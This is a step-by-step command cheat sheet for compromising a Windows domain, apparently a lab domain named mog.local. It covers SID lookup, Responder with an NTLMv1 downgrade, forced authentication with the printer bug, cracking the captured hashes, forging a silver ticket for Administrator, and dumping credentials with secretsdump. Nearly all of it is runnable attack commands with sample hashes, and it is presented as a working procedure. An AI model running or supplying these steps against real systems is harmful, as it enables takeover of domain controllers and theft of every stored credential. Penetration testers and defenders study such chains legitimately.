1) lookup sid
cd ~/impacket/examples
python3 lookupsid.py Mog/EvilMog@mog.local

2) export sid to variable
export SID="S-1-5-21-1200878168-886626559-2939620051"

3) start responder with
./responder -I eth0 -wrfFP --lm
[can also run without --lm and use hashcat]

4) second window kick off printer bug
cd ~/krbrelayx
python3 printerbug.py MOG/evilmog@dc1.mog.local 192.168.1.128

5) run ntlmv1 multi tool
cd ~/git/ntlmv1-multi
python3 ./ntlmv1.py --ntlm "SERVER1$::MOG:9DE7F41D81C1207400000000000000000000000000000000:DE766A98B60D1C911DCFFFDBB3E521314B2CE34EAB63CC7B:1122334455667788"
python3 ./ntlmv1.py --ntlm "SERVER1$::MOG:FD434CC89967CB4AE99313AC9A0C3AA252A8E011735A15EE:FD434CC89967CB4AE99313AC9A0C3AA252A8E011735A15EE:1122334455667788"

6) crack with crack.sh or hashcat

6a) save results
export NTHASH="c0faa2e8c64eb55cd657db3dfb3dd3c7" # server1
export NTHASH="562090366a39267f07d15f602a12bbd0" # DC1

7) create silver ticket
ticketer.py -nthash $NTHASH -domain-sid $SID -domain mog.local -spn 'HOST/DC1.mog.local' Administrator

8) export
export KRB5CCNAME=/root/impacket/examples/Administrator.ccache

9) secretsdump
python3 secretsdump.py Administrator@dc1.mog.local -k -no-pass
python3 secretsdump.py Administrator@server1.mog.local -k -no-pass

